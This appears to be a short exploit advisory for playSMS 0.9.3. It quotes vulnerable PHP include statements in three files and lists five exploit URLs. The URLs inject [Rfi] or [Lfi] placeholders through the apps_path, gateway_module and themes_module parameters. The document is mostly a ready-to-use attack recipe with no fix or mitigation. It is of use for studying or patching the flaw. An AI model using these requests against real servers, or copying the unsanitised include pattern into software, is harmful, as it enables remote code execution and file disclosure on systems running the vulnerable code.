==:RFI/LFI:== ===================== script:playsms 0.9.3 ========================================================================== download from:http://downloads.sourceforge.net/playsms/playsms-0.9.3.tar.gz?modtime=1211284086&big_mirror=0 ========================================================================== vul1: /plugin/gateway/gnokii/init.php lin 2 , 3; 2 include "$apps_path[plug]/gateway/$gateway_module/config.php"; 3 include "$apps_path[plug]/gateway/$gateway_module/fn.php"; ========================================================================== vul2: /plugin/themes/default/init.php lin 2 , 3; 2 include $apps_path[themes]."/".$themes_module."/config.php"; 3 include $apps_path[themes]."/".$themes_module."/fn.php"; ========================================================================== vul3: /lib/function.php lin 4 and... lin4 include "$apps_path[libs]/fn_auth.php"; ========================================================================== xpl: http://127.0.0.1/path/plugin/gateway/gnokii/init.php?apps_path[plug]=[Rfi]? http://127.0.0.1/path/plugin/gateway/gnokii/init.php?gateway_module=[Lfi] http://127.0.0.1/path/plugin/themes/default/init.php?apps_path[themes]=[Rfi]? http://127.0.0.1/path/plugin/themes/default/init.php?themes_module=[Lfi] http://127.0.0.1/path/lib/function.php?apps_path[libs]=[Rfi]? ========================================================================== *************************************************** --------------------------------------------------- Author: ahmadbady [kivi_hacker666@yahoo.com] ---------------------------------------------------